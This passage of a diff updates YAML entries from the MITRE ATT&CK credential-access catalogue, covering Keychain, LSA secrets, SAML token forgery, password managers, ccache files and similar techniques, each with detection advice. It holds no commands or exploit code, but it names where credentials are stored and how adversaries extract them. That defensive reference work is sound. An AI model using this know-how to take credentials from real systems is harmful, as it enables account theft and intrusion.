-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -43801,65 +44420,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -43868,6 +44484,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -43875,31 +44494,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -43912,14 +44563,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -43960,14 +44611,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -44030,81 +44678,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -44189,12 +44835,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44243,38 +44888,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -44298,76 +44918,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
